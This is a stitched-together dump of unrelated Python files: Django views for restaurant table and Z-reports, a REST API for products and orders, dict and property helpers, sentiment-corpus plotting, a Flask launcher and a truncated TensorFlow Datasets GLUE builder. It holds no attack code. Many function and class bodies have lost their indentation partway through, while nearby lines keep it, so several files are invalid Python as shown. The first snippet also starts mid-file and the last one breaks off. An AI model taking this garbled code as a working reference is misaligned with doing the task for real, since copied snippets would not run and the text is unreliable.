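    sample = 'httplog http-in servers srv1 200 -- 0 1 2 5 9'
    log = HttpLog.parse(sample)
    print(log.get_latency(), log.get_request_count(), log.get_status_code())  # 5 1 200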
|
python
|
import json5
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.utils import timezone
from home.models import SiparisKayitlari, Masa
from kullanici.models import Profil
from menu.models import Menu
import datetime
@login_required(login_url="/login/")
def kayitlar(request):
masalar = Masa.objects.all()
user = Profil.objects.filter(user=request.user)
bilgiler=[]
if user:
bilgiler = user[0]
context = {
"masa": masalar,
"bilgi": bilgiler,
"link": "/kayitlar/masalar/masa/",
"title": "Geçmiş Masa Kayıtları"
}
return render(request, "gecmis_kayitlar.html", context)
@login_required(login_url="/login/")
def z_raporu(request):
masalar = Masa.objects.all()
user = Profil.objects.filter(user=request.user)
bilgiler=[]
if user:
bilgiler = user[0]
context = {
"masa": masalar,
"bilgi": bilgiler,
"link": "/kayitlar/z-raporu/",
"title": "Z Raporu"
}
return render(request, "gecmis_kayitlar.html", context)
@login_required(login_url="/login/")
def z_rapor_kaydi(request, masa_no):
masa = Masa.objects.get(masa_no=masa_no)
    kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no,
                                               siparis_zamani__day=timezone.now().day,
                                               siparis_zamani__month=timezone.now().month,
                                               siparis_zamani__year=timezone.now().year)
    menu = Menu.objects.all()
    bilgiler = []
    user = Profil.objects.filter(user=request.user)
    if user:
        bilgiler = user[0]
    context = {
        "masa": masa,
        "kayitlar": kayitlar,
        "menu": menu,
        "bilgi": bilgiler
    }
    urun_list = {}  # product name -> [quantity, unit price]
    tum_list = {}   # product name -> [quantity, total revenue]
    toplam_para = 0
    toplam_musteri = 0
    for i in kayitlar:
        toplam_para += i.toplam_ucret
        toplam_musteri += i.kisi_sayisi
        kayit = json5.loads(i.siparis_list)
        for k in kayit.keys():
            for m in menu:
                if int(k) == m.id:
                    if m.urun_adi not in urun_list:
                        urun_list[m.urun_adi] = [kayit[k], m.fiyat]
                    else:
                        temp = urun_list.get(m.urun_adi)
                        urun_list[m.urun_adi] = [temp[0] + kayit[k], m.fiyat]
    toplam_urun = 0
    for i in urun_list:
        sayi = urun_list[i][0]
        toplam_urun += sayi
        fiyat = urun_list[i][1]
        tum_list[i] = [sayi, sayi * fiyat]
    context["list"] = tum_list
    context["toplam_para"] = toplam_para
    context["toplam_urun"] = toplam_urun
    context["toplam_musteri"] = toplam_musteri
    return render(request, "z-rapor-view.html", context)
@login_required(login_url="/login/")
def gunluk_z_raporu(request):
    kayitlar = SiparisKayitlari.objects.filter(siparis_zamani__day=timezone.now().day,
                                               siparis_zamani__month=timezone.now().month,
                                               siparis_zamani__year=timezone.now().year)
    menu = Menu.objects.all()
    bilgiler = []
    user = Profil.objects.filter(user=request.user)
    if user:
        bilgiler = user[0]
    context = {
        "kayitlar": kayitlar,
        "menu": menu,
        "bilgi": bilgiler
    }
    urun_list = {}  # product name -> [quantity, unit price]
    tum_list = {}   # product name -> [quantity, total revenue]
    toplam_para = 0
    toplam_musteri = 0
    for i in kayitlar:
        toplam_para += i.toplam_ucret
        toplam_musteri += i.kisi_sayisi
        kayit = json5.loads(i.siparis_list)
        for k in kayit.keys():
            for m in menu:
                if int(k) == m.id:
                    if m.urun_adi not in urun_list:
                        urun_list[m.urun_adi] = [kayit[k], m.fiyat]
                    else:
                        temp = urun_list.get(m.urun_adi)
                        urun_list[m.urun_adi] = [temp[0] + kayit[k], m.fiyat]
    toplam_urun = 0
    for i in urun_list:
        sayi = urun_list[i][0]
        toplam_urun += sayi
        fiyat = urun_list[i][1]
        tum_list[i] = [sayi, sayi * fiyat]
    context["list"] = tum_list
    context["toplam_para"] = toplam_para
    context["toplam_urun"] = toplam_urun
    context["toplam_musteri"] = toplam_musteri
    return render(request, "gunluk-z-raporu.html", context)
@login_required(login_url="/login/")
def masa_kaydi(request, masa_no):
masa = Masa.objects.get(masa_no=masa_no)
menu = Menu.objects.all()
user = Profil.objects.filter(user=request.user)
bilgiler=[]
if user:
bilgiler = user[0]
context = {
"masa": masa,
"menu": menu,
"bilgi": bilgiler
}
if request.GET.get("filtreleme_turu", None) == "basic":
tur = request.GET.get("tur", None)
if tur == "Günlük":
kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no,
siparis_zamani__day=timezone.now().day,
siparis_zamani__month=timezone.now().month,
siparis_zamani__year=timezone.now().year).order_by("-id")
elif tur == "Haftalık":
        one_week_ago = timezone.now() - timezone.timedelta(days=7)
        kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no,
                                                   siparis_zamani__gte=one_week_ago).order_by("-id")
elif tur == "Aylık":
kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no,
siparis_zamani__month=timezone.now().month,siparis_zamani__year=timezone.now().year).order_by("-id")
else:
kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no).order_by("-id")
context["kayitlar"] = kayitlar
elif request.GET.get("filtreleme_turu", None) == "belirli":
tarih = request.GET.get("tarih", None)
        date = datetime.datetime.strptime(tarih, '%Y-%m-%d')
        kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no, siparis_zamani__day=date.day,
                                                   siparis_zamani__month=date.month,
                                                   siparis_zamani__year=date.year).order_by("-id")
context["kayitlar"] = kayitlar
elif request.GET.get("filtreleme_turu", None) == "aralık":
baslangic = request.GET.get("baslangic", None)
bitis = request.GET.get("bitis", None)
date_baslangic = datetime.datetime.strptime(baslangic, '%Y-%m-%d')
date_bitis = datetime.datetime.strptime(bitis, '%Y-%m-%d') + timezone.timedelta(days=1)
kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no, siparis_zamani__gte=date_baslangic,
siparis_zamani__lte=date_bitis).order_by("-id")
context["kayitlar"] = kayitlar
else:
kayitlar = SiparisKayitlari.objects.filter(masa_no=masa_no).order_by("-id")
context["kayitlar"] = kayitlar
return render(request, "masa_kayit_view.html", context)
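# Pure-Python sketch of the aggregation logic used in the z-report views above
# (hypothetical sample data, for illustration only): each parsed `siparis_list`
# maps a menu item id to a quantity; totals map product name -> [count, revenue].
if __name__ == '__main__':
    menu_fiyatlari = {1: ("Tea", 10), 2: ("Coffee", 15)}  # id -> (name, unit price)
    siparisler = [{"1": 2}, {"1": 1, "2": 3}]
    toplamlar = {}
    for kayit in siparisler:
        for k, adet in kayit.items():
            ad, fiyat = menu_fiyatlari[int(k)]
            sayi = toplamlar.get(ad, [0, 0])[0] + adet
            toplamlar[ad] = [sayi, sayi * fiyat]
    print(toplamlar)  # {'Tea': [3, 30], 'Coffee': [3, 45]}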
|
python
|
from django.shortcuts import render
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Product, Denomination, Order, OrderItem
from end_users import serializers
# Create your views here.
""" All Product related APIs here"""
class ProductApiView(APIView):
serializer_class = serializers.ProductSerializer
""" return all available products"""
def get(self, request, format=None):
""" return all available products"""
products = Product.objects.all()
serializer = self.serializer_class(products, many=True)
return Response({'status':'success', 'response':serializer.data})
""" Create new products"""
def post(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
prod_saved = serializer.save()
return Response({"success": "Product '{}' created successfully".format(prod_saved.name)})
else:
return Response(
serializer.errors,
                status=status.HTTP_400_BAD_REQUEST)
    """ Delete all products"""
    def delete(self, request):
        Product.objects.all().delete()
        return Response({'status':'success', 'response':'Deleted Successfully'})
""" All denomination APIs here"""
class DenominationApiView(APIView):
    serializer_class = serializers.DenominationSerializer
    """ return all available denominations"""
    def get(self, request, format=None):
        """ return all available denominations"""
denominations = Denomination.objects.all()
serializer = self.serializer_class(denominations, many=True)
return Response({'status':'success', 'response':serializer.data})
""" Create new Denomination"""
def post(self, request):
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
denomination_saved = serializer.save()
return Response({"success": "Denomination '{}' created successfully".format(denomination_saved.val)})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST)
""" Delete all Denominations"""
    def delete(self, request):
        Denomination.objects.all().delete()
        return Response({'status':'success', 'response':'Deleted Successfully'})
""" All Order APIs here"""
class OrderApiView(APIView):
serializer_class = serializers.OrderSerializer
""" get placed order details"""
def get(self, request, format=None):
# import pdb; pdb.set_trace()
orders = Order.objects.all()
serializer = self.serializer_class(orders, many=True)
return Response({'status':'success', 'response':serializer.data})
""" Place new order """
def post(self, request):
""" place order"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
order_saved = serializer.save()
return Response({"success": "Order '{}' created successfully".format(order_saved.Date)})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST)
""" Delete all Orders"""
    def delete(self, request):
        Order.objects.all().delete()
        return Response({'status':'success', 'response':'Deleted Successfully'})
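# Hypothetical URL wiring for these views (module and route names below are
# assumptions for illustration; they are not part of this file):
#
# from django.urls import path
# from end_users import views
#
# urlpatterns = [
#     path('products/', views.ProductApiView.as_view()),
#     path('denominations/', views.DenominationApiView.as_view()),
#     path('orders/', views.OrderApiView.as_view()),
# ]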
|
python
|
"""
Contains some helper functions and classes.
"""
import os
import shutil
import typing as t
class attrdict(dict):
"""
    A dict subclass that supports attribute-style read and write access.
>>> profile = attrdict({
'languages': ['python', 'cpp', 'javascript', 'c'],
'nickname': 'doge gui',
'age': 23
})
>>> profile.languages.append('Russian') # Add language to profile
>>> profile.languages
['python', 'cpp', 'javascript', 'c', 'Russian']
>>> profile.age == 23
True
    Attribute-style keys must not collide with dict methods, and must obey Python syntax:
>>> profile.1 = 0
Traceback (most recent call last):
...
SyntaxError: invalid syntax
>>> profile.popitem = None # Rewrite
"""
def __setattr__(self, name: str, value: t.Any) -> None:
if name in dir(dict):
super().__setattr__(name, value)
else:
super().__setitem__(name, value)
def __getattribute__(self, name: str) -> t.Any:
if name in dir(dict):
return super().__getattribute__(name)
return super().__getitem__(name)
class staticdict(attrdict):
"""
    staticdict inherits all behaviors from attrdict but bans all write operations on it.
>>> final = staticdict({
'loaded': False,
'config': './carental/config.py'
})
>>> not final.loaded is True
True
>>> final.brand = 'new'
Traceback (most recent call last):
...
RuntimeError: cannot set value on staticdict
"""
    def __setattr__(self, _key: str, _value: object) -> None:
        if _key in dir(dict):
            return super().__setattr__(_key, _value)
        raise RuntimeError('cannot set value on staticdict')
def __delattr__(self, _key: str):
raise RuntimeError('cannot delete value on staticdict')
_T = t.TypeVar('_T')
class property_(t.Generic[_T]):
"""
    A one-line ``property``-like descriptor to support reading class attributes stored
    under a prefixed name, without writing a full getter for each one.
    When we want to declare a property inside a class, we usually write this:
>>> class Bar:
def __init__(self, size: int, count: int) -> None:
self._size = size
self._count = count
@property
def size(self) -> int:
return self._size
@property
def count(self) -> int:
return self._count
    Clearly this is redundant; by using ``property_`` we could instead write:
    >>> class AnotherBar(Bar):
    size = property_('size', type_=int)
    count = property_('count', type_=int, writable=True)
    You can also choose which prefix is used before the attribute name.
    The default one is '_'.
"""
    def __init__(self, name: str, type_: t.Type[_T] = t.Any, prefix: str = '_',
                 writable: bool = False, deletable: bool = False) -> None:
        """
        Args:
            name (str): variable name.
            type_ (Type[_T], optional): type for type hinting. Defaults to Any.
            prefix (str, optional): prefix before the variable name. Defaults to '_'.
            writable (bool, optional): whether write access is allowed. Defaults to False.
            deletable (bool, optional): whether delete access is allowed. Defaults to False.
        """
        self.__name, self.__prefix = name, prefix
        self.__writable, self.__deletable = writable, deletable
def __gen_prefix(self, obj) -> str:
prefix = self.__prefix
if prefix.startswith('__'):
prefix = '_' + type(obj).__name__ + prefix
return prefix
def __get__(self, obj, _objtype) -> _T:
return getattr(obj, self.__gen_prefix(obj) + self.__name)
    def __set__(self, obj, data: _T) -> None:
        if self.__writable:
            setattr(obj, self.__gen_prefix(obj) + self.__name, data)
def __delete__(self, obj) -> None:
if self.__deletable:
delattr(obj, self.__gen_prefix(obj) + self.__name)
def listdir(path: str, excludes: t.Container[str] = None) -> t.Iterator[str]:
"""
    List all directories inside a specific path.
    Args:
        path (str): path to explore.
        excludes (Container[str], optional): dirnames to exclude. Defaults to None.
Yields:
Iterator[str]: absolute path of subdirectories.
Raises:
FileNotFoundError: when given invalid ``path``.
"""
    if excludes is None:
        excludes = set()
    for itemname in os.listdir(path.strip('\\')):
        fullname = os.path.join(path, itemname)
        if os.path.isdir(fullname) and itemname not in excludes:
yield os.path.abspath(fullname)
def rmdir(path: str) -> None:
    """Remove a directory and all files inside it.
    Args:
        path (str): absolute path of the directory to remove.
Raises:
FileNotFoundError: when ``path`` not exists.
"""
if not os.path.isdir(path):
raise FileNotFoundError()
shutil.rmtree(path, ignore_errors=False)
def startstrip(string: str, part: str) -> str:
"""
Remove ``part`` from beginning of ``string`` if ``string`` startswith ``part``.
Args:
string (str): source string.
part (str): removing part.
    Returns:
        str: ``string`` with ``part`` removed from its start.
"""
if string.startswith(part):
return string[len(part):]
return string
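# Illustrative sketch of the helpers above (hypothetical classes and data):
if __name__ == '__main__':
    class Car:
        size = property_('size', type_=int)
        def __init__(self, size: int) -> None:
            self._size = size
    print(Car(4).size)  # -> 4 (read through the '_' prefix)
    profile = attrdict({'nickname': 'demo'})
    profile.age = 1  # stored as a dict item, not a real attribute
    print(profile.nickname, profile['age'])  # -> demo 1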
|
python
|
"""
In this module are stored the main Neural Networks Architectures.
"""
from .base_architectures import (BaseDecoder, BaseDiscriminator, BaseEncoder,
BaseMetric)
__all__ = ["BaseDecoder", "BaseEncoder", "BaseMetric", "BaseDiscriminator"]
|
python
|
"""kernels tests."""
|
python
|
nome = str(input('Digite seu nome completo: ')).strip()
n = nome.split()
print(f"Seu primeiro nome é: {n[0]}")
print(f"Seu último nome é: {n[-1]}")
|
python
|
#!/usr/bin/env python3
from matplotlib import pyplot as plt
from nltk.tokenize import word_tokenize
from classify import load_data
from features import FeatureExtractor
import pandas as pd
import numpy as np
def visualize_class_balance(data_path, classes):
class_counts = {c: 0 for c in classes}
    for c in classes:
        filename = data_path + '.' + c
        with open(filename) as file_:
            # count the number of lines (= examples) for this class
            class_counts[c] = sum(1 for _ in file_)
total = sum(class_counts.values()) * 1.0
class_freqs = [(class_counts[c]/total)*100 for c in classes]
freqs_str = ['{:.2f}%'.format(f) for f in class_freqs]
plt.pie(class_freqs, labels=freqs_str)
plt.legend(classes)
plt.show()
def visualize_tags(data_path, classes):
sents, labels, ids = load_data(data_path)
feats = FeatureExtractor(bow=False, negation=False,
emoji=False, senti_words=False,
emoticon=False, postag=True,
verbose=False)
feats.make_bow(sents)
tags = feats.get_representation(sents)
df = pd.DataFrame(tags, index=ids,
columns=['N', 'ADV', 'ADJ', 'V'])
df['label'] = [classes[l] for l in labels]
counts = df.groupby('label').sum()
counts = counts.div(counts.sum(axis=1), axis=0)
counts *= 100
counts.plot.bar(rot=0)
plt.xlabel('Class')
plt.ylabel('Frequency of PoS tag (%)')
plt.show()
def visualize_polarities(data_path, classes, lexicon_path):
lexicon = pd.read_csv(lexicon_path, names=['word', 'sentiment'])
negative_words = lexicon.loc[lexicon['sentiment'] == -1, 'word']
neutral_words = lexicon.loc[lexicon['sentiment'] == 0, 'word']
positive_words = lexicon.loc[lexicon['sentiment'] == 1, 'word']
sents, labels, ids = load_data(data_path)
polarity_counts = pd.DataFrame(0, index=['negative', 'neutral', 'positive', 'total'],
columns=classes)
for i, sent in enumerate(sents):
class_ = classes[labels[i]]
tokens = word_tokenize(sent, language='portuguese')
negative_count = len(set(tokens).intersection(set(negative_words)))
neutral_count = len(set(tokens).intersection(set(neutral_words)))
positive_count = len(set(tokens).intersection(set(positive_words)))
polarity_counts.loc['negative', class_] += negative_count
polarity_counts.loc['neutral', class_] += neutral_count
polarity_counts.loc['positive', class_] += positive_count
polarity_counts.loc['total', class_] += len(tokens)
polarity_rates = polarity_counts.div(polarity_counts.loc['total', :])
polarity_rates *= 100
polarity_rates.loc[polarity_rates.index != 'total', :].T.plot.bar(rot=0)
plt.xlabel('Class')
plt.ylabel('Rate of polarity words (%)')
plt.show()
def visualize_sentence_length(data_path, classes):
sents, labels, ids = load_data(data_path)
lengths = pd.DataFrame(index=ids,
columns=['label', 'length'])
for i, sent in enumerate(sents):
class_ = classes[labels[i]]
lengths.loc[ids[i], 'label'] = class_
tokens = word_tokenize(sent, language='portuguese')
sent_len = len(tokens)
lengths.loc[ids[i], 'length'] = sent_len
lengths.boxplot(column='length', by='label')
plt.title('')
plt.suptitle('')
plt.xlabel('Class')
plt.ylabel('Sentence length (tokens)')
plt.show()
def main():
data_path = 'data/corpus/trainTT'
lexicon_path = 'data/resources/sentilex-reduzido.txt'
classes = ['neg', 'neu', 'pos']
visualize_class_balance(data_path, classes)
visualize_tags(data_path, classes)
visualize_polarities(data_path, classes, lexicon_path)
visualize_sentence_length(data_path, classes)
if __name__ == "__main__":
main()
|
python
|
from lib.userInterface import userInterface
if __name__ == '__main__':
ui = userInterface()
if ui.yesNoQuery("Input from file? [y/n]"):
path = input("Please input path of your file: ")
ui.fileInput(path)
else:
ui.userInput()
ui.quantize().predict()
    print("The predicted price is: %f\n" % ui.getPredictedPrice())
if ui.yesNoQuery("Print regression report? [y/n]"):
ui.printReport()
|
python
|
from django.core.urlresolvers import reverse
from nose.tools import eq_
from mozillians.common.tests import TestCase
from mozillians.groups.tests import GroupFactory
from mozillians.users.tests import UserFactory
class OldGroupRedirectionMiddlewareTests(TestCase):
def setUp(self):
self.user = UserFactory.create()
    def test_valid_name(self):
        """Valid group with a name that matches the old group regex doesn't redirect."""
group = GroupFactory.create(name='111-foo')
GroupFactory.create(name='foo')
url = reverse('groups:show_group', kwargs={'url': group.url})
with self.login(self.user) as client:
response = client.get(url, follow=True)
eq_(response.status_code, 200)
eq_(response.context['group'], group)
def test_old_group_url_redirects(self):
group = GroupFactory.create()
url = '/group/111-{0}/'.format(group.url)
with self.login(self.user) as client:
response = client.get(url, follow=True)
eq_(response.status_code, 200)
eq_(response.context['group'], group)
def test_not_existing_group_404s(self):
url = '/group/111-invalid/'
with self.login(self.user) as client:
response = client.get(url, follow=True)
eq_(response.status_code, 404)
|
python
|
import os
hosturl = os.environ.get('HOSTURL')
from lightserv import create_app
from lightserv.config import DevConfig,ProdConfig
import socket
flask_mode = os.environ['FLASK_MODE']
if flask_mode == 'PROD':
    app = create_app(ProdConfig)
elif flask_mode == 'DEV':
    app = create_app(DevConfig)
else:
    raise ValueError("Unknown FLASK_MODE: %s" % flask_mode)
if __name__ == '__main__':
import logging
    logger = logging.getLogger('werkzeug')
    logger.setLevel(logging.DEBUG)
    formatter = logging.Formatter('%(asctime)s:%(name)s:%(message)s')
''' Make the file handler to deal with logging to file '''
file_handler = logging.FileHandler('logs/app_debug.log')
file_handler.setFormatter(formatter)
stream_handler = logging.StreamHandler() # level already set at debug from logger.setLevel() above
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
logger.addHandler(file_handler)
    if flask_mode == 'DEV':
        app.run(host='0.0.0.0', port=5000, debug=True)  # port 5000 inside the container
    elif flask_mode == 'PROD':
        app.run(host='0.0.0.0', port=5000, debug=False)  # port 5000 inside the container
|
python
|
from dataclasses import dataclass
from expungeservice.models.charge import ChargeType
from expungeservice.models.charge import ChargeUtil
from expungeservice.models.expungement_result import TypeEligibility, EligibilityStatus
@dataclass(frozen=True)
class SevereCharge(ChargeType):
type_name: str = "Severe Charge"
expungement_rules: str = (
"""Charges that are harsher than Class A Felonies in severity: namely, murder and treason."""
)
def type_eligibility(self, disposition):
if ChargeUtil.dismissed(disposition):
raise ValueError("Dismissed criminal charges should have been caught by another class.")
elif ChargeUtil.convicted(disposition):
return TypeEligibility(EligibilityStatus.INELIGIBLE, reason="Ineligible by omission from statute")
|
python
|
# coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The General Language Understanding Evaluation (GLUE) benchmark."""
import csv
import os
import textwrap
import numpy as np
import six
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
_GLUE_CITATION = """\
@inproceedings{wang2019glue,
title={{GLUE}: A Multi-Task Benchmark and Analysis Platform for Natural Language Understanding},
author={Wang, Alex and Singh, Amanpreet and Michael, Julian and Hill, Felix and Levy, Omer and Bowman, Samuel R.},
note={In the Proceedings of ICLR.},
year={2019}
}
Note that each GLUE dataset has its own citation. Please see the source to see
the correct citation for each contained dataset."""
_GLUE_DESCRIPTION = """\
GLUE, the General Language Understanding Evaluation benchmark
(https://gluebenchmark.com/) is a collection of resources for training,
evaluating, and analyzing natural language understanding systems.
"""
_MRPC_DEV_IDS = "https://firebasestorage.googleapis.com/v0/b/mtl-sentence-representations.appspot.com/o/data%2Fmrpc_dev_ids.tsv?alt=media&token=ec5c0836-31d5-48f4-b431-7480817f1adc"
_MRPC_TRAIN = "https://dl.fbaipublicfiles.com/senteval/senteval_data/msr_paraphrase_train.txt"
_MRPC_TEST = "https://dl.fbaipublicfiles.com/senteval/senteval_data/msr_paraphrase_test.txt"
_MNLI_BASE_KWARGS = dict(
text_features={
"premise": "sentence1",
"hypothesis": "sentence2",
},
label_classes=["entailment", "neutral", "contradiction"],
label_column="gold_label",
data_url="https://dl.fbaipublicfiles.com/glue/data/MNLI.zip",
data_dir="MNLI",
citation=textwrap.dedent("""\
@InProceedings{N18-1101,
author = "Williams, Adina
and Nangia, Nikita
and Bowman, Samuel",
title = "A Broad-Coverage Challenge Corpus for
Sentence Understanding through Inference",
booktitle = "Proceedings of the 2018 Conference of
the North American Chapter of the
Association for Computational Linguistics:
Human Language Technologies, Volume 1 (Long
Papers)",
year = "2018",
publisher = "Association for Computational Linguistics",
pages = "1112--1122",
location = "New Orleans, Louisiana",
url = "http://aclweb.org/anthology/N18-1101"
}
@article{bowman2015large,
title={A large annotated corpus for learning natural language inference},
author={Bowman, Samuel R and Angeli, Gabor and Potts, Christopher and Manning, Christopher D},
journal={arXiv preprint arXiv:1508.05326},
year={2015}
}"""),
url="http://www.nyu.edu/projects/bowman/multinli/")
class GlueConfig(tfds.core.BuilderConfig):
"""BuilderConfig for GLUE."""
def __init__(self,
*,
text_features,
label_column,
data_url,
data_dir,
citation,
url,
label_classes=None,
process_label=lambda x: x,
**kwargs):
"""BuilderConfig for GLUE.
Args:
text_features: `dict[string, string]`, map from the name of the feature
dict for each text field to the name of the column in the tsv file
label_column: `string`, name of the column in the tsv file corresponding
to the label
data_url: `string`, url to download the zip file from
data_dir: `string`, the path to the folder containing the tsv files in the
downloaded zip
citation: `string`, citation for the data set
url: `string`, url for information about the data set
label_classes: `list[string]`, the list of classes if the label is
categorical. If not provided, then the label will be of type
`tf.float32`.
process_label: `Function[string, any]`, function taking in the raw value
of the label and processing it to the form required by the label feature
**kwargs: keyword arguments forwarded to super.
"""
super(GlueConfig, self).__init__(
version=tfds.core.Version("1.0.0"),
release_notes={
"1.0.0": "New split API (https://tensorflow.org/datasets/splits)",
"1.0.1": "Update dead URL links.",
},
**kwargs)
self.text_features = text_features
self.label_column = label_column
self.label_classes = label_classes
self.data_url = data_url
self.data_dir = data_dir
self.citation = citation
self.url = url
self.process_label = process_label
class Glue(tfds.core.GeneratorBasedBuilder):
"""The General Language Understanding Evaluation (GLUE) benchmark."""
BUILDER_CONFIGS = [
GlueConfig(
name="cola",
description=textwrap.dedent("""\
The Corpus of Linguistic Acceptability consists of English
acceptability judgments drawn from books and journal articles on
linguistic theory. Each example is a sequence of words annotated
with whether it is a grammatical English sentence."""),
text_features={"sentence": "sentence"},
label_classes=["unacceptable", "acceptable"],
label_column="is_acceptable",
data_url="https://dl.fbaipublicfiles.com/glue/data/CoLA.zip",
data_dir="CoLA",
citation=textwrap.dedent("""\
@article{warstadt2018neural,
title={Neural Network Acceptability Judgments},
author={Warstadt, Alex and Singh, Amanpreet and Bowman, Samuel R},
journal={arXiv preprint arXiv:1805.12471},
year={2018}
}"""),
url="https://nyu-mll.github.io/CoLA/"),
GlueConfig(
name="sst2",
description=textwrap.dedent("""\
The Stanford Sentiment Treebank consists of sentences from movie reviews and
human annotations of their sentiment. The task is to predict the sentiment of a
given sentence. We use the two-way (positive/negative) class split, and use only
sentence-level labels."""),
text_features={"sentence": "sentence"},
label_classes=["negative", "positive"],
label_column="label",
data_url="https://dl.fbaipublicfiles.com/glue/data/SST-2.zip",
data_dir="SST-2",
citation=textwrap.dedent("""\
@inproceedings{socher2013recursive,
title={Recursive deep models for semantic compositionality over a sentiment treebank},
author={Socher, Richard and Perelygin, Alex and Wu, Jean and Chuang, Jason and Manning, Christopher D and Ng, Andrew and Potts, Christopher},
booktitle={Proceedings of the 2013 conference on empirical methods in natural language processing},
pages={1631--1642},
year={2013}
}"""),
url="https://nlp.stanford.edu/sentiment/index.html"),
GlueConfig(
name="mrpc",
description=textwrap.dedent("""\
The Microsoft Research Paraphrase Corpus (Dolan & Brockett, 2005) is a corpus of
sentence pairs automatically extracted from online news sources, with human annotations
for whether the sentences in the pair are semantically equivalent."""), # pylint: disable=line-too-long
text_features={
"sentence1": "",
"sentence2": ""
},
label_classes=["not_equivalent", "equivalent"],
label_column="Quality",
data_url="", # MRPC isn't hosted by GLUE.
data_dir="MRPC",
citation=textwrap.dedent("""\
@inproceedings{dolan2005automatically,
title={Automatically constructing a corpus of sentential paraphrases},
author={Dolan, William B and Brockett, Chris},
booktitle={Proceedings of the Third International Workshop on Paraphrasing (IWP2005)},
year={2005}
}"""),
url="https://www.microsoft.com/en-us/download/details.aspx?id=52398"
),
GlueConfig(
name="qqp",
description=textwrap.dedent("""\
The Quora Question Pairs2 dataset is a collection of question pairs from the
community question-answering website Quora. The task is to determine whether a
pair of questions are semantically equivalent."""),
text_features={
"question1": "question1",
"question2": "question2",
},
label_classes=["not_duplicate", "duplicate"],
label_column="is_duplicate",
data_url="https://dl.fbaipublicfiles.com/glue/data/QQP.zip",
data_dir="QQP",
citation=textwrap.dedent("""\
@online{WinNT,
author = {Iyer, Shankar and Dandekar, Nikhil and Csernai, Kornel},
title = {First Quora Dataset Release: Question Pairs},
year = 2017,
url = {https://data.quora.com/First-Quora-Dataset-Release-Question-Pairs},
urldate = {2019-04-03}
}"""),
url="https://data.quora.com/First-Quora-Dataset-Release-Question-Pairs"
),
GlueConfig(
name="stsb",
description=textwrap.dedent("""\
The Semantic Textual Similarity Benchmark (Cer et al., 2017) is a collection of
sentence pairs drawn from news headlines, video and image captions, and natural
language inference data. Each pair is human-annotated with a similarity score
from 1 to 5."""),
text_features={
"sentence1": "sentence1",
"sentence2": "sentence2",
},
label_column="score",
data_url="https://dl.fbaipublicfiles.com/glue/data/STS-B.zip",
data_dir="STS-B",
citation=textwrap.dedent("""\
@article{cer2017semeval,
title={Semeval-2017 task 1: Semantic textual similarity-multilingual and cross-lingual focused evaluation},
author={Cer, Daniel and Diab, Mona and Agirre, Eneko and Lopez-Gazpio, Inigo and Specia, Lucia},
journal={arXiv preprint arXiv:1708.00055},
year={2017}
}"""),
url="http://ixa2.si.ehu.es/stswiki/index.php/STSbenchmark",
process_label=np.float32),
GlueConfig(
name="mnli",
description=textwrap.dedent("""\
The Multi-Genre Natural Language Inference Corpus is a crowdsourced
collection of sentence pairs with textual entailment annotations. Given a premise sentence
and a hypothesis sentence, the task is to predict whether the premise entails the hypothesis
(entailment), contradicts the hypothesis (contradiction), or neither (neutral). The premise sentences are
gathered from ten different sources, including transcribed speech, fiction, and government reports.
We use the standard test set, for which we obtained private labels from the authors, and evaluate
on both the matched (in-domain) and mismatched (cross-domain) section. We also use and recommend
the SNLI corpus as 550k examples of auxiliary training data."""),
**_MNLI_BASE_KWARGS),
GlueConfig(
name="mnli_mismatched",
description=textwrap.dedent("""\
The mismatched validation and test splits from MNLI.
See the "mnli" BuilderConfig for additional information."""),
**_MNLI_BASE_KWARGS),
GlueConfig(
name="mnli_matched",
description=textwrap.dedent("""\
The matched validation and test splits from MNLI.
See the "mnli" BuilderConfig for additional information."""),
**_MNLI_BASE_KWARGS),
GlueConfig(
name="qnli",
description=textwrap.dedent("""\
The Stanford Question Answering Dataset is a question-answering
dataset consisting of question-paragraph pairs, where one of the sentences in the paragraph (drawn
from Wikipedia) contains the answer to the corresponding question (written by an annotator). We
convert the task into sentence pair classification by forming a pair between each question and each
sentence in the corresponding context, and filtering out pairs with low lexical overlap between the
question and the context sentence. The task is to determine whether the context sentence contains
the answer to the question. This modified version of the original task removes the requirement that
the model select the exact answer, but also removes the simplifying assumptions that the answer
is always present in the input and that lexical overlap is a reliable cue."""), # pylint: disable=line-too-long
text_features={
"question": "question",
"sentence": "sentence",
},
label_classes=["entailment", "not_entailment"],
label_column="label",
data_url="https://dl.fbaipublicfiles.com/glue/data/QNLIv2.zip",
data_dir="QNLI",
citation=textwrap.dedent("""\
@article{rajpurkar2016squad,
title={Squad: 100,000+ questions for machine comprehension of text},
author={Rajpurkar, Pranav and Zhang, Jian and Lopyrev, Konstantin and Liang, Percy},
journal={arXiv preprint arXiv:1606.05250},
year={2016}
}"""),
url="https://rajpurkar.github.io/SQuAD-explorer/"),
GlueConfig(
name="rte",
description=textwrap.dedent("""\
The Recognizing Textual Entailment (RTE) datasets come from a series of annual textual
entailment challenges. We combine the data from RTE1 (Dagan et al., 2006), RTE2 (Bar Haim
et al., 2006), RTE3 (Giampiccolo et al., 2007), and RTE5 (Bentivogli et al., 2009).4 Examples are
constructed based on news and Wikipedia text. We convert all datasets to a two-class split, where
for three-class datasets we collapse neutral and contradiction into not entailment, for consistency."""), # pylint: disable=line-too-long
text_features={
